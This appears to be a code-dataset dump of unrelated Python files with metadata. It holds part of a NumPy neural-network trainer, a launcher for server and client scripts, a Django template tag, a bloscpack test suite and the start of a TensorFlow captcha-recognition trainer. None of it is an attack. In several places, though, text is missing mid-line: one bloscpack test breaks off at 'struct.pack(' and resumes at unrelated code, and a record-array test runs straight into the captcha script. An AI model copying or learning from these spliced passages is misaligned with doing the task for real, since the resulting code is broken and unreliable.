={}\n w_vt ={} \n b_vt ={}\n for j in range(self.epoch):\n self.iterations = math.ceil(input_neurons.shape[1]/self.batch_size)\n for i in range(self.iterations):\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(self.batch_size==1):\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n else:\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels[(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(j!=0 or i!=0):\n for d in range(len(d_weights)):\n w_mt[d]= beta1 * w_mt[d] \n b_mt[d] =beta1 * b_mt[d] \n w_vt[d]= beta2 * w_vt[d] \n b_vt[d] = beta2 * b_vt[d] \n mt_hat = w_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n vt_hat = w_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n bmt_hat = b_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n bvt_hat = 
b_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n\n self.weights[d] = self.weights[d] - self.learning_rate *(1/np.sqrt(vt_hat+epsilon))* mt_hat\n self.bias[d] = self.bias[d] - self.learning_rate *(1/np.sqrt(bvt_hat+epsilon))* bmt_hat\n\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(self.batch_size==1):\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n else:\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels[(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n\n\n w_mt[d] += (1-beta1) * d_weights[d]\n b_mt[d] += (1-beta1) * d_bias[d]\n w_vt[d] += (1-beta2) * np.power(d_weights[d],2)\n b_vt[d] += (1-beta2) * np.power(d_bias[d],2)\n\n mt_hat = w_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n vt_hat = w_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n bmt_hat = b_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n bvt_hat = b_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n\n self.weights[d] = self.weights[d] - self.learning_rate *(1/np.sqrt(vt_hat+epsilon))* mt_hat\n self.bias[d] = self.bias[d] - self.learning_rate *(1/np.sqrt(bvt_hat+epsilon))* bmt_hat\n \n else:\n for d in range(len(d_weights)):\n w_mt[d] = (1-beta1) * d_weights[d]\n b_mt[d] = (1-beta1) * d_bias[d]\n w_vt[d] = (1-beta2) * np.power(d_weights[d],2)\n b_vt[d] = (1-beta2) * np.power(d_bias[d],2)\n\n mt_hat = w_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n vt_hat = w_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n bmt_hat = b_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n bvt_hat = b_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n\n self.weights[d] = self.weights[d] - self.learning_rate *(1/np.sqrt(vt_hat+epsilon))* mt_hat\n self.bias[d] = self.bias[d] - self.learning_rate *(1/np.sqrt(bvt_hat+epsilon))* bmt_hat\n \n self.logging(j) \n\n return self.weights, self.bias\ndef save_wb(weights, biases):\n try:\n os.mkdir(model_name)\n except:\n pass\n with open(model_name+'model-weights3.pickle', 'wb') as f:\n pickle.dump(weights, f, pickle.HIGHEST_PROTOCOL)\n with open(model_name+'model-bias3.pickle', 'wb') as f:\n pickle.dump(biases, f, pickle.HIGHEST_PROTOCOL)\n\ndef train():\n \n #wandb.init(project ='confusion_matrix',config=config_, magic=True,reinit = True)\n wandb.init(config=config_, magic=True,reinit = True)\n wandb.run.name = 'bs-'+str(wandb.config.batch_size)+'-lr-'+ str(wandb.config.learning_rate)+'-ep-'+str(wandb.config.epochs)+ '-op-'+str(wandb.config.optimizer)+ '-nhl-'+str(wandb.config.no_hidden_layers)+'-shl-'+str(wandb.config.size_hidden_layers)+ '-act-'+str(wandb.config.activation)+'-wd-'+str(wandb.config.weight_decay)+'-wi-'+str(wandb.config.weight_initializations)+'-lf-'+str(wandb.config.loss_function)\n\n\n batch_size = wandb.config.batch_size \n learning_rate = wandb.config.learning_rate \n epoch = wandb.config.epochs \n optimizer = wandb.config.optimizer \n no_hidden_layer = wandb.config.no_hidden_layers \n size_hidden_layer = wandb.config.size_hidden_layers \n activation = wandb.config.activation \n weight_init = wandb.config.weight_initializations \n weight_decay = wandb.config.weight_decay \n loss_function = wandb.config.loss_function\n\n\n\n\n \n ffnn = NN( [size_hidden_layer]*no_hidden_layer, no_classes,batch_size,learning_rate,epoch,activation,weight_init,weight_decay,loss_function)\n \n if optimizer == 'sgd':\n weight, bias=ffnn.sgd(train_input_neurons, 
learning_rate, epoch)\n elif optimizer == 'momentum':\n weight, bias = ffnn.momentum_gd(train_input_neurons,gamma)\n elif optimizer == 'nesterov':\n weight, bias = ffnn.nesterov_accelerated_gd(train_input_neurons,gamma)\n elif optimizer == 'rmsprop':\n weight, bias = ffnn.rmsprop(train_input_neurons,beta,epsilon)\n elif optimizer == 'adam':\n weight, bias = ffnn.adam(train_input_neurons,beta1,beta2,epsilon)\n elif optimizer =='gd':\n weight, bias = ffnn.gradient_descent(train_input_neurons, learning_rate, epoch)\n elif optimizer =='nadam':\n weight, bias = ffnn.nadam(train_input_neurons,beta1,beta2,epsilon)\n else:\n print('Invalid optimizer. Choose from sgd, momentum, nesterov, rmsprop, adam, nadam, gd')\n \n save_wb(weight, bias)\n\n test_prediction = ffnn.make_predictions(test_input_neurons)\n test_accuracy = ffnn.get_accuracy(test_prediction, test_labels)\n print(\"test accuracy: {}\".format(test_accuracy))\n \n # confusion matrix\n print(\"\\nconfusion matrix\\n\")\n y_actual = pd.Series(test_labels, name='Actual')\n y_prediction = pd.Series(test_prediction, name='Predicted')\n # print(confusion_matrix)\n confusion_matrix = ffnn.confusion_matrix(y_actual, y_prediction)\n print(confusion_matrix)\n ffnn.confusion_matrix_plot(confusion_matrix)\n\n \n \nif __name__ == \"__main__\":\n train()\n wandb.finish()\n\n#classes = {0 : \"T-shirt/top\", 1: \"Trouser\", 2: \"Pullover\", 3: \"Dress\", 4: \"Coat\",5: \"Sandal\", 6: \"Shirt\", 7: \"Sneaker\", 8: \"Bag\", 9: \"Ankle Boot\"}","sub_path":"Assignment1/assign1_q10.py","file_name":"assign1_q10.py","file_ext":"py","file_size_in_byte":25568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"108793055","text":"import time\nimport os\nimport subprocess\nimport signal\n\nCHOICE_TEXT = \"\"\"\n1 - start the server\n2 - stop the server\n3 - start clients \n4 - stop clients\n5 - stop everything and exit\nChoose an action: \"\"\"\n\nSERVER_FILE_NAME = 'server_class.py'\nCLIENT_FILE_NAME = 'client_class.py'\n\nPATH_TO_FILE = os.path.dirname(__file__)\nPATH_TO_SERVER = os.path.join(PATH_TO_FILE, SERVER_FILE_NAME)\nPATH_TO_CLIENT = os.path.join(PATH_TO_FILE, CLIENT_FILE_NAME)\nPATH_FOR_MAC_SERVER = os.path.realpath(PATH_TO_SERVER)\n\nSERVER_PROCESE = []\nCLIENT_PROCESE = []\n\n\ndef start_server():\n if len(SERVER_PROCESE) == 0:\n try:\n try:\n if os.name == 'posix':\n server = subprocess.Popen(\n f'osascript -e \\'tell application \"Terminal\" to do'\n f' script \"python3 {os.path.realpath(PATH_TO_SERVER)}\"\\'', shell=True)\n print(server.pid)\n SERVER_PROCESE.append(server)\n else:\n server = subprocess.Popen(f'python {PATH_TO_SERVER}', creationflags=subprocess.CREATE_NEW_CONSOLE)\n SERVER_PROCESE.append(server)\n print('Start_Server')\n except:\n print('Error start_server ')\n\n except:\n print('ERROR on start server process')\n else:\n print('Server already created.')\n\n\ndef stop_server():\n # print(f'Server process count {len(SERVER_PROCESE)}')\n # print('----')\n print(SERVER_PROCESE[0].pid)\n os.killpg(os.getpgid(SERVER_PROCESE[0].pid), signal.SIGKILL)\n # print(f'Server process count after kill {len(SERVER_PROCESE)}')\n # print('----')\n\n print('Stop_Server')\n\n\ndef start_client():\n client_count = int(input('How many clients need to be opened? 
'))\n print(client_count)\n\n for i in range(client_count):\n try:\n if os.name == 'posix':\n client = subprocess.Popen(f'osascript -e \\'tell application \"Terminal\" to do'\n f' script \"python3 {os.path.realpath(PATH_TO_CLIENT)}\"\\'', shell=True)\n print(client.pid)\n else:\n client = subprocess.Popen(f'python {PATH_TO_CLIENT}', creationflags=subprocess.CREATE_NEW_CONSOLE)\n\n CLIENT_PROCESE.append(client)\n print('Start_client')\n except:\n print('Error start client ')\n time.sleep(1)\n\n print('Start_Client')\n print('----')\n print(f'Client process count {len(CLIENT_PROCESE)}')\n print('----')\n\n\ndef stop_client():\n for i, item in enumerate(CLIENT_PROCESE):\n print(f'PID - {item.pid}')\n pid = item.pid\n os.kill(pid, signal.SIGKILL)\n print('Stop_client')\n\n\ndef stop_all():\n if len(SERVER_PROCESE) > 0:\n stop_server()\n\n if len(CLIENT_PROCESE) > 0:\n stop_client()\n\n print('Stop_all')\n\n\ndef start_loop():\n while True:\n print(CHOICE_TEXT)\n CHOISE_VAR = input()\n if CHOISE_VAR == '1':\n start_server()\n elif CHOISE_VAR == '2':\n stop_server()\n elif CHOISE_VAR == '3':\n start_client()\n elif CHOISE_VAR == '4':\n stop_client()\n elif CHOISE_VAR == '5':\n stop_all()\n break\n\n\nif __name__ == '__main__':\n start_loop()","sub_path":"launcher_ver_2.0.py","file_name":"launcher_ver_2.0.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"293456481","text":"from django.contrib.contenttypes.models import ContentType\nfrom django.core.urlresolvers import reverse\nfrom django import template\nregister = template.Library()\n\n\n@register.inclusion_tag('admin_edit_link.html')\ndef edit_link(obj):\n content_type = ContentType.objects.get_for_model(obj.__class__)\n link = reverse('admin:%s_%s_change' % (content_type.app_label,\n content_type.model), args=(obj.pk,))\n return {'link': link}\n","sub_path":"utils/templatetags/admin_edit.py","file_name":"admin_edit.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"94680556","text":"#!/usr/bin/env nosetests\n# -*- coding: utf-8 -*-\n# vim :set ft=py:\n\nfrom __future__ import print_function\n\nimport os.path as path\nimport tempfile\nimport contextlib\nimport shutil\nimport struct\nimport atexit\nimport numpy as np\nimport numpy.testing as npt\nimport nose.tools as nt\nfrom nose_parameterized import parameterized\nfrom collections import namedtuple\nfrom cStringIO import StringIO\nimport bloscpack\nfrom bloscpack import *\n\n\ndef test_hashes():\n nt.assert_equal(len(CHECKSUMS), 9)\n checksums_avail = ['None', 'adler32', 'crc32',\n 'md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512']\n nt.assert_equal(CHECKSUMS_AVAIL, checksums_avail)\n # just make sure the hashes do actually compute something.\n csum_targets=[\n '',\n '\\x13\\x02\\xc1\\x03',\n '\\xbd\\xfa.\\xaa',\n '\\x04\\x8fD\\xd46\\xd5$M\\xd7c0\\xb1$mUC',\n '\\xae\\xea\\xddm\\x86t\\x86v\\r\\x96O\\x9fuPh\\x1a\\x01!#\\xe6',\n ' (W\\xc8\\x1b\\x14\\x16w\\xec\\xc4\\xd7\\x89xU\\xc5\\x02*\\x15\\xb4q\\xe09\\xd0$'+\\\n '\\xe2+{\\x0e',\n 's\\x83U6N\\x81\\xa7\\xd8\\xd3\\xce)E/\\xa5N\\xde\\xda\\xa6\\x1c\\x90*\\xb0q&m='+\\\n '\\xea6\\xc0\\x02\\x11-',\n 'to\\xef\\xf2go\\x08\\xcf#\\x9e\\x05\\x8d~\\xa0R\\xc1\\x93/\\xa5\\x0b\\x8b9'+\\\n '\\x91E\\nKDYW\\x1d\\xff\\x84\\xbe\\x11\\x02X\\xd1)\"(\\x0cO\\tJ=\\xf5f\\x94',\n '\\x12w\\xc9V/\\x84\\xe4\\x0cd\\xf0@\\xd2U:Ae\\xd9\\x9b\\xfbm\\xe2^*\\xdc\\x96KG'+\\\n 
'\\x06\\xa9\\xc7\\xee\\x02\\x1d\\xac\\x08\\xf3\\x9a*/\\x02\\x8b\\x89\\xa0\\x0b'+\\\n '\\xa5=r\\xd2\\x9b\\xf5Z\\xf0\\xe9z\\xb6d\\xa7\\x00\\x12<7\\x11\\x08e',]\n for i, csum in enumerate(CHECKSUMS):\n nt.assert_equal(csum(\"\\x23\\x42\\xbe\\xef\"), csum_targets[i])\n\n\ndef test_codecs():\n nt.assert_equal(CODECS_AVAIL, ['None', 'zlib'])\n random_str = \"4KzGCl7SxTsYLaerommsMWyZg1TXbV6wsR9Xk\"\n for i, c in enumerate(CODECS):\n nt.assert_equal(random_str, c.decompress(\n c.compress(random_str, DEFAULT_META_LEVEL)))\n\n\ndef test_serializers():\n nt.assert_equal(SERIZLIALIZERS_AVAIL, ['JSON'])\n output = '{\"dtype\":\"float64\",\"shape\":[1024],\"others\":[]}'\n input_ = eval(output)\n for s in SERIZLIALIZERS:\n nt.assert_equal(output, s.dumps(input_))\n nt.assert_equal(input_, s.loads(output))\n\n\ndef test_print_verbose():\n nt.assert_raises(TypeError, print_verbose, 'message', 'MAXIMUM')\n bloscpack.LEVEL = DEBUG\n # should probably hijack the print statement\n print_verbose('notification')\n bloscpack.LEVEL = NORMAL\n\n\ndef test_error():\n # switch out the exit, to make sure test-suite doesn't fall over\n backup = bloscpack.sys.exit\n bloscpack.sys.exit = lambda x: x\n # should probably hijack the print statement\n error('error')\n bloscpack.sys.exit = backup\n\n\ndef test_pretty_filesieze():\n\n nt.assert_equal('0B', pretty_size(0))\n nt.assert_equal('9.0T', pretty_size(9898989898879))\n nt.assert_equal('4.78G', pretty_size(5129898234))\n nt.assert_equal('12.3M', pretty_size(12898234))\n nt.assert_equal('966.7K', pretty_size(989898))\n nt.assert_equal('128.0B', pretty_size(128))\n nt.assert_equal(0, reverse_pretty('0B'))\n nt.assert_equal(8, reverse_pretty('8B'))\n nt.assert_equal(8192, reverse_pretty('8K'))\n nt.assert_equal(134217728, reverse_pretty('128M'))\n nt.assert_equal(2147483648, reverse_pretty('2G'))\n nt.assert_equal(2199023255552, reverse_pretty('2T'))\n # can't handle Petabytes, yet\n nt.assert_raises(ValueError, reverse_pretty, '2P')\n\n\ndef test_parser():\n # hmmm I guess we could override the error\n parser = create_parser()\n\n\ndef test_check_files():\n args = namedtuple('Args', 'force')(False)\n # check input_file exists\n nt.assert_raises(FileNotFound, check_files,\n 'nosuchfile', 'nosuchfile', args)\n # check that output_file does not exists\n nt.assert_raises(FileNotFound, check_files, 'test_bloscpack.py',\n 'test_bloscpack.py', args)\n # check that everything is fine\n args = namedtuple('Args', 'force')(True)\n nt.assert_equal(check_files('test_bloscpack.py',\n 'test_bloscpack.py', args), None)\n\n\ndef test_check_blosc_arguments():\n missing = DEFAULT_BLOSC_ARGS.copy()\n missing.pop('typesize')\n nt.assert_raises(ValueError, bloscpack._check_blosc_args, missing)\n extra = DEFAULT_BLOSC_ARGS.copy()\n extra['wtf'] = 'wtf'\n nt.assert_raises(ValueError, bloscpack._check_blosc_args, extra)\n\n\ndef test_check_bloscpack_arguments():\n missing = DEFAULT_BLOSCPACK_ARGS.copy()\n missing.pop('offsets')\n nt.assert_raises(ValueError, bloscpack._check_bloscpack_args, missing)\n extra = DEFAULT_BLOSCPACK_ARGS.copy()\n extra['wtf'] = 'wtf'\n nt.assert_raises(ValueError, bloscpack._check_bloscpack_args, extra)\n\n\ndef test_check_metadata_arguments():\n missing = DEFAULT_METADATA_ARGS.copy()\n missing.pop('magic_format')\n nt.assert_raises(ValueError, bloscpack._check_metadata_arguments, missing)\n extra = DEFAULT_METADATA_ARGS.copy()\n extra['wtf'] = 'wtf'\n nt.assert_raises(ValueError, bloscpack._check_metadata_arguments, extra)\n\n\ndef test_check_range():\n 
nt.assert_raises(TypeError, check_range, 'test', 'a', 0, 1)\n nt.assert_raises(ValueError, check_range, 'test', -1, 0, 1)\n nt.assert_raises(ValueError, check_range, 'test', 2, 0, 1)\n\n\ndef test_calculate_nchunks():\n # check for zero or negative chunk_size\n nt.assert_raises(ValueError, calculate_nchunks,\n 23, chunk_size=0)\n nt.assert_raises(ValueError, calculate_nchunks,\n 23, chunk_size=-1)\n\n nt.assert_equal((9, 1, 1), calculate_nchunks(9, chunk_size=1))\n nt.assert_equal((5, 2, 1), calculate_nchunks(9, chunk_size=2))\n nt.assert_equal((3, 3, 3), calculate_nchunks(9, chunk_size=3))\n nt.assert_equal((3, 4, 1), calculate_nchunks(9, chunk_size=4))\n nt.assert_equal((2, 5, 4), calculate_nchunks(9, chunk_size=5))\n nt.assert_equal((2, 6, 3), calculate_nchunks(9, chunk_size=6))\n nt.assert_equal((2, 7, 2), calculate_nchunks(9, chunk_size=7))\n nt.assert_equal((2, 8, 1), calculate_nchunks(9, chunk_size=8))\n nt.assert_equal((1, 9, 9), calculate_nchunks(9, chunk_size=9))\n\n # check downgrade\n nt.assert_equal((1, 23, 23), calculate_nchunks(23, chunk_size=24))\n\n # single byte file\n nt.assert_equal((1, 1, 1),\n calculate_nchunks(1, chunk_size=1))\n\n # check that a zero length file raises an error\n nt.assert_raises(ValueError, calculate_nchunks, 0)\n # in_file_size must be strictly positive\n nt.assert_raises(ValueError, calculate_nchunks, -1)\n\n # check overflow of nchunks due to chunk_size being too small\n # and thus stuff not fitting into the header\n nt.assert_raises(ChunkingException, calculate_nchunks,\n MAX_CHUNKS+1, chunk_size=1)\n\n # check that strings are converted correctly\n nt.assert_equal((6, 1048576, 209715),\n calculate_nchunks(reverse_pretty('5.2M')))\n nt.assert_equal((3, 2097152, 1258291),\n calculate_nchunks(reverse_pretty('5.2M'),\n chunk_size='2M'))\n\n\ndef test_decode_blosc_header():\n array_ = np.linspace(0, 100, 2e4).tostring()\n # basic test case\n blosc_args = DEFAULT_BLOSC_ARGS\n compressed = blosc.compress(array_, **blosc_args)\n header = decode_blosc_header(compressed)\n expected = {'versionlz': 1,\n 'blocksize': 131072,\n 'ctbytes': len(compressed),\n 'version': 2,\n 'flags': 1,\n 'nbytes': len(array_),\n 'typesize': blosc_args['typesize']}\n nt.assert_equal(expected, header)\n # deactivate shuffle\n blosc_args['shuffle'] = False\n compressed = blosc.compress(array_, **blosc_args)\n header = decode_blosc_header(compressed)\n expected = {'versionlz': 1,\n 'blocksize': 131072,\n 'ctbytes': len(compressed),\n 'version': 2,\n 'flags': 0, # no shuffle flag\n 'nbytes': len(array_),\n 'typesize': blosc_args['typesize']}\n nt.assert_equal(expected, header)\n # uncompressible data\n array_ = np.asarray(np.random.randn(23),\n dtype=np.float32).tostring()\n blosc_args['shuffle'] = True\n compressed = blosc.compress(array_, **blosc_args)\n header = decode_blosc_header(compressed)\n expected = {'versionlz': 1,\n 'blocksize': 88,\n 'ctbytes': len(array_) + 16, # original + 16 header bytes\n 'version': 2,\n 'flags': 3, # 1 for shuffle 2 for non-compressed\n 'nbytes': len(array_),\n 'typesize': blosc_args['typesize']}\n nt.assert_equal(expected, header)\n\n\ndef test_create_options():\n nt.assert_equal('00000001', create_options())\n nt.assert_equal('00000001', create_options(offsets=True))\n nt.assert_equal('00000000', create_options(offsets=False))\n\n nt.assert_equal('00000001', create_options(metadata=False))\n nt.assert_equal('00000011', create_options(metadata=True))\n\n nt.assert_equal('00000000', create_options(offsets=False, metadata=False))\n 
nt.assert_equal('00000010', create_options(offsets=False, metadata=True))\n nt.assert_equal('00000001', create_options(offsets=True, metadata=False))\n nt.assert_equal('00000011', create_options(offsets=True, metadata=True))\n\n\ndef test_decode_options():\n nt.assert_equal({'offsets': False,\n 'metadata': False},\n decode_options('00000000'))\n nt.assert_equal({'offsets': False,\n 'metadata': True},\n decode_options('00000010'))\n nt.assert_equal({'offsets': True,\n 'metadata': False},\n decode_options('00000001'))\n nt.assert_equal({'offsets': True,\n 'metadata': True},\n decode_options('00000011'))\n\n nt.assert_raises(ValueError, decode_options, '0000000')\n nt.assert_raises(ValueError, decode_options, '000000000')\n nt.assert_raises(ValueError, decode_options, '0000000a')\n nt.assert_raises(ValueError, decode_options, 'abc')\n\n nt.assert_raises(ValueError, decode_options, '00000100')\n nt.assert_raises(ValueError, decode_options, '00001100')\n nt.assert_raises(ValueError, decode_options, '11111100')\n\n\ndef test_create_metadata_options():\n nt.assert_equal('00000000', create_metadata_options())\n\n\ndef test_decode_metadata_options():\n nt.assert_equal({}, decode_metadata_options('00000000'))\n nt.assert_raises(ValueError, decode_metadata_options, '0000000')\n nt.assert_raises(ValueError, decode_metadata_options, '000000000')\n nt.assert_raises(ValueError, decode_metadata_options, '0000000a')\n nt.assert_raises(ValueError, decode_metadata_options, 'abc')\n\n nt.assert_raises(ValueError, decode_metadata_options, '00000001')\n nt.assert_raises(ValueError, decode_metadata_options, '00001111')\n nt.assert_raises(ValueError, decode_metadata_options, '11111111')\n\n\ndef test_check_options():\n # check for non-string\n nt.assert_raises(TypeError, bloscpack._check_options, 0)\n nt.assert_raises(TypeError, bloscpack._check_options, 1)\n # check for lengths too small and too large\n nt.assert_raises(ValueError, bloscpack._check_options, '0')\n nt.assert_raises(ValueError, bloscpack._check_options, '1')\n nt.assert_raises(ValueError, bloscpack._check_options, '0000000')\n nt.assert_raises(ValueError, bloscpack._check_options, '000000000')\n nt.assert_raises(ValueError, bloscpack._check_options, '1111111')\n nt.assert_raises(ValueError, bloscpack._check_options, '111111111')\n # check for non zeros and ones\n nt.assert_raises(ValueError, bloscpack._check_options, '0000000a')\n nt.assert_raises(ValueError, bloscpack._check_options, 'aaaaaaaa')\n\n\ndef test_BloscPackHeader_constructor_arguments():\n # check format_version\n nt.assert_raises(ValueError, BloscPackHeader, format_version=-1)\n nt.assert_raises(ValueError, BloscPackHeader,\n format_version=MAX_FORMAT_VERSION+1)\n nt.assert_raises(TypeError, BloscPackHeader, format_version='foo')\n # check checksum\n nt.assert_raises(ValueError, BloscPackHeader, checksum=-1)\n nt.assert_raises(ValueError, BloscPackHeader,\n checksum=len(CHECKSUMS)+1)\n nt.assert_raises(NoSuchChecksum, BloscPackHeader, checksum='foo')\n # check the typesize\n nt.assert_raises(ValueError, BloscPackHeader, typesize=-1)\n nt.assert_raises(ValueError, BloscPackHeader,\n typesize=blosc.BLOSC_MAX_TYPESIZE+1)\n # check chunk_size\n nt.assert_raises(ValueError, BloscPackHeader,\n chunk_size=blosc.BLOSC_MAX_BUFFERSIZE+1)\n nt.assert_raises(ValueError, BloscPackHeader, chunk_size=-2)\n nt.assert_raises(TypeError, BloscPackHeader, chunk_size='foo')\n # check last_chunk\n nt.assert_raises(ValueError, BloscPackHeader,\n last_chunk=blosc.BLOSC_MAX_BUFFERSIZE+1)\n 
nt.assert_raises(ValueError, BloscPackHeader, last_chunk=-2)\n nt.assert_raises(TypeError, BloscPackHeader, last_chunk='foo')\n # check value of nchunks\n nt.assert_raises(ValueError, BloscPackHeader, nchunks=MAX_CHUNKS+1)\n nt.assert_raises(ValueError, BloscPackHeader, nchunks=-2)\n nt.assert_raises(TypeError, BloscPackHeader, nchunks='foo')\n\n # check value of max_app_chunks\n nt.assert_raises(ValueError, BloscPackHeader, max_app_chunks=MAX_CHUNKS+1)\n nt.assert_raises(ValueError, BloscPackHeader, max_app_chunks=-1)\n nt.assert_raises(TypeError, BloscPackHeader, max_app_chunks='foo')\n\n # check sum\n nt.assert_raises(ValueError, BloscPackHeader,\n nchunks=MAX_CHUNKS/2+1,\n max_app_chunks=MAX_CHUNKS/2+1)\n\n # check constrain on last_chunk\n nt.assert_raises(ValueError, BloscPackHeader,\n chunk_size=1,\n last_chunk=2)\n\n\ndef test_BloscPackHeader_encode():\n\n # test with no arguments\n raw = MAGIC + struct.pack('> 5, int_id)\n\n\ndef test_disable_offsets():\n in_fp, out_fp, dcmp_fp = StringIO(), StringIO(), StringIO()\n create_array_fp(1, in_fp)\n in_fp_size = in_fp.tell()\n in_fp.seek(0)\n bloscpack_args = DEFAULT_BLOSCPACK_ARGS.copy()\n bloscpack_args['offsets'] = False\n source = PlainFPSource(in_fp)\n sink = CompressedFPSink(out_fp)\n bloscpack.pack(source, sink,\n *calculate_nchunks(in_fp_size),\n bloscpack_args=bloscpack_args)\n out_fp.seek(0)\n bloscpack_header, metadata, metadata_header, offsets = \\\n bloscpack._read_beginning(out_fp)\n nt.assert_true(len(offsets) == 0)\n\n\ndef test_invalid_format():\n # this will cause a bug if we ever reach 255 format versions\n bloscpack.FORMAT_VERSION = MAX_FORMAT_VERSION\n blosc_args = DEFAULT_BLOSC_ARGS\n with create_tmp_files() as (tdir, in_file, out_file, dcmp_file):\n create_array(1, in_file)\n bloscpack.pack_file(in_file, out_file, blosc_args=blosc_args)\n nt.assert_raises(FormatVersionMismatch, unpack_file, out_file, dcmp_file)\n bloscpack.FORMAT_VERSION = FORMAT_VERSION\n\ndef test_file_corruption():\n with create_tmp_files() as (tdir, in_file, out_file, dcmp_file):\n create_array(1, in_file)\n pack_file(in_file, out_file)\n # now go in and modify a byte in the file\n with open(out_file, 'r+b') as input_fp:\n # read offsets and header\n bloscpack._read_offsets(input_fp,\n bloscpack._read_bloscpack_header(input_fp))\n # read the blosc header of the first chunk\n input_fp.read(BLOSC_HEADER_LENGTH)\n # read four bytes\n input_fp.read(4)\n # read the fifth byte\n fifth = input_fp.read(1)\n # figure out what to replace it by\n replace = '\\x00' if fifth == '\\xff' else '\\xff'\n # seek one byte back relative to current position\n input_fp.seek(-1, 1)\n # write the flipped byte\n input_fp.write(replace)\n # now attempt to unpack it\n nt.assert_raises(ChecksumMismatch, unpack_file, out_file, dcmp_file)\n\n\ndef test_roundtrip_numpy():\n # first try with the standard StringIO\n a = np.arange(50)\n sio = StringIO()\n sink = CompressedFPSink(sio)\n pack_ndarray(a, sink)\n sio.seek(0)\n source = CompressedFPSource(sio)\n b = unpack_ndarray(source)\n npt.assert_array_equal(a, b)\n\n # now use ths shiny CompressedMemorySink/Source combo\n a = np.arange(50)\n sink = CompressedMemorySink()\n pack_ndarray(a, sink)\n source = CompressedMemorySource(sink)\n b = unpack_ndarray(source)\n npt.assert_array_equal(a, b)\n\n # and lastly try the pack_*_str\n s = pack_ndarray_str(a)\n b = unpack_ndarray_str(s)\n npt.assert_array_equal(a, b)\n\n\ndef test_numpy_dtypes_shapes_order():\n for dt in np.sctypes['int'] + np.sctypes['uint'] + 
np.sctypes['float']:\n a = np.arange(64, dtype=dt)\n roundtrip_ndarray(a)\n a = a.copy().reshape(8, 8)\n roundtrip_ndarray(a)\n a = a.copy().reshape(4, 16)\n roundtrip_ndarray(a)\n a = a.copy().reshape(4, 4, 4)\n roundtrip_ndarray(a)\n a = np.asfortranarray(a)\n nt.assert_true(np.isfortran(a))\n roundtrip_ndarray(a)\n\n # Fixed width string arrays\n a = np.array(['abc', 'def', 'ghi'])\n roundtrip_ndarray(a)\n # This actually gets cast to a fixed width string array\n a = np.array([(1, 'abc'), (2, 'def'), (3, 'ghi')])\n roundtrip_ndarray(a)\n # object arrays\n a = np.array([(1, 'abc'), (2, 'def'), (3, 'ghi')], dtype='object')\n roundtrip_ndarray(a)\n\n # record array\n x = np.array([(1, 'O', 1)],\n dtype=np.dtype([('step', 'int32'),\n ('symbol', '|S1'),\n ('index', 'int32')]))\n roundtrip_ndarray(x)\n\n # and a nested record array\n dt = [('year', ' 2:\n gray = np.mean(img, -1)\n # The line above is faster; the standard conversion would be:\n # r, g, b = img[:,:,0], img[:,:,1], img[:,:,2]\n # gray = 0.2989 * r + 0.5870 * g + 0.1140 * b\n return gray\n else:\n return img\n\n\ndef text2vec(text, char2txt_map):\n vec = []\n for idx, char in enumerate(text):\n vec.append(char2txt_map[char])\n\n return np.concatenate(vec).ravel()\n\n\ndef get_next_batch(batch_size):\n batch_x = np.zeros([batch_size, constant.IMAGE_HEIGHT * constant.IMAGE_WIDTH])\n batch_y = np.zeros([batch_size, constant.MAX_CAPTCHA * CHAR_SET_LEN])\n\n for i in range(batch_size):\n text, image = gen_captcha_text_and_image(text_size=1, width=constant.IMAGE_WIDTH, height=constant.IMAGE_HEIGHT)\n image = convert2gray(image)\n\n batch_x[i, :] = image.flatten() / 255 # (image.flatten()-128)/128 for zero mean\n char2txt_map = make_char2vec_map(constant.char_set)\n batch_y[i, :] = text2vec(text, char2txt_map)\n # return this training batch\n return batch_x, batch_y\n\n\n# Generate 300 random captcha images\nx = np.zeros([300, constant.IMAGE_HEIGHT * constant.IMAGE_WIDTH])\ny = np.zeros([300, constant.MAX_CAPTCHA * CHAR_SET_LEN])\n\n\ndef get_next_batch_overfit(batch_size):\n for i in range(300):\n text, image = gen_captcha_text_and_image(text_size=1, width=constant.IMAGE_WIDTH, height=constant.IMAGE_HEIGHT)\n image = convert2gray(image)\n x[i, :] = image.flatten() / 255\n char2txt_map = make_char2vec_map(constant.char_set)\n y[i, :] = text2vec(text, char2txt_map)\n\n # Hand back batch_size random samples. Shuffling x and y independently would\n # break the image/label pairing, so apply one shared permutation to both.\n perm = np.random.permutation(len(x))\n return x[perm][:batch_size], y[perm][:batch_size]\n\n\n####################################################################\n# Placeholders sized to the flattened image\nX = tf.placeholder(tf.float32, [None, constant.IMAGE_HEIGHT * constant.IMAGE_WIDTH])\nY = tf.placeholder(tf.float32, [None, constant.MAX_CAPTCHA * CHAR_SET_LEN])\nkeep_prob = 